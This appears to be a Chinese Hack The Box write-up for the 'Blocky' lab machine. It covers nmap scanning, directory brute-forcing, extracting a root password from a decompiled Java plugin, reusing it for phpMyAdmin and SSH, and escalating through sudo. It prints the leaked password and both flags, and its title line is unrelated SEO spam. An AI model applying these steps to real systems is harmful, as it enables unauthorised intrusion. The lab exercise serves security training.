东莞寮步在哪里_株洲seo网站优化软件_免费十八种禁用网站_提升神马关键词排名报价

目录

连接至HTB服务器并启动靶机

使用nmap对靶机进行端口扫描

再次使用nmap对靶机开放端口进行脚本、服务信息扫描

对FTP服务版本：ProFTPD_1.3.5进行漏洞扫描

对SSH服务版本：OpenSSH 7.2p2进行漏洞扫描

使用浏览器访问靶机80端口

使用浏览器访问URL：http://blocky.htb/plugins

通过获取到的凭证登录到phpMyAdmin

USER_FLAG：ae2e8f6446440ddf3c42aa4653c9fb5b

权限提升

ROOT_FLAG：dad0c0993274a6ddce75361278ba3f4c

---

连接至HTB服务器并启动靶机

靶机IP：10.10.10.37

分配IP：10.10.16.22

---

使用nmap对靶机进行端口扫描

 nmap -p- --min-rate=1500 -T4 -sS -sU -Pn 10.10.10.37

靶机开放端口：21、22、80、25565。均为TCP端口

再次使用nmap对靶机开放端口进行脚本、服务信息扫描

nmap -p21,22,80,25565 -sCV 10.10.10.37

从扫描结果可见靶机应该是Ubuntu_Linux系统，对各服务版本进行漏洞扫描

对FTP服务版本：ProFTPD_1.3.5进行漏洞扫描

searchsploit ProFTPD 1.3.5

可以看到基本是什么文件复制洞，尝试匿名登录一下靶机FTP服务器

ftp 10.10.10.37

┌──(root㉿kali)-[/home/kali/Desktop]
└─# ftp 10.10.10.37                                                   
Connected to 10.10.10.37.
220 ProFTPD 1.3.5a Server (Debian) [::ffff:10.10.10.37]
Name (10.10.10.37:kali): anonymous
331 Password required for anonymous
Password:
530 Login incorrect.

对SSH服务版本：OpenSSH 7.2p2进行漏洞扫描

searchsploit OpenSSH 7.2p2

SSH服务这边只有用户名枚举漏洞，对我来说也没啥用

使用浏览器访问靶机80端口

直接访问会显示链接已被重置，所以我们将IP和域名写入hosts文件使DNS本地解析

echo '10.10.10.37 blocky.htb' >> /etc/hosts

接着使用dirbuster、dirsearch、ffuf、wfuzz等工具对靶机路径进行爆破

ffuf -u http://blocky.htb/FUZZ -w ../dictionary/common.txt

这里不知道什么原因，用ffuf爆破出来的目录响应码和真实响应码不一致

使用浏览器访问URL：http://blocky.htb/plugins

直接点击BlockyCore.jar文件将其下载到本地

使用JD-GUI打开该文件

用户：root

密码：8YsqfCTnvxAUeduzjNSXe22

---

通过获取到的凭证登录到phpMyAdmin

在左侧数据库栏目中选择：wordpress->wp_users。可以找到用户notch，以及哈希密码

可以确定该用户就是数据库管理者，尝试通过SSH服务同密码登录

查找user_flag位置

find / -name 'user.txt' 2>/dev/null

/home/notch/user.txt
/usr/share/doc/phpmyadmin/html/_sources/user.txt

查看user_flag内容

notch@Blocky:~$ cat /usr/share/doc/phpmyadmin/html/_sources/user.txt
User Guide
==========

.. toctree::
    :maxdepth: 2

    transformations
    privileges
    other
    import_export
notch@Blocky:~$ cat /home/notch/user.txt
ae2e8f6446440ddf3c42aa4653c9fb5b

USER_FLAG：ae2e8f6446440ddf3c42aa4653c9fb5b

---

权限提升

查看当前用户可特权运行的文件

sudo -l

notch@Blocky:~$ sudo -l
Matching Defaults entries for notch on Blocky:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
    (ALL : ALL) ALL

发现所有文件都可以特权运行，那就直接将shell切换到root用户即可

sudo su root

查找root_flag位置

find / -name 'root.txt'

notch@Blocky:~$ sudo su root
root@Blocky:/home/notch# pwd
/home/notch
root@Blocky:/home/notch# find / -name 'root.txt'
/root/root.txt

查看root_flag内容

cat /root/root.txt

root@Blocky:/home/notch# cat /root/root.txt
dad0c0993274a6ddce75361278ba3f4c

ROOT_FLAG：dad0c0993274a6ddce75361278ba3f4c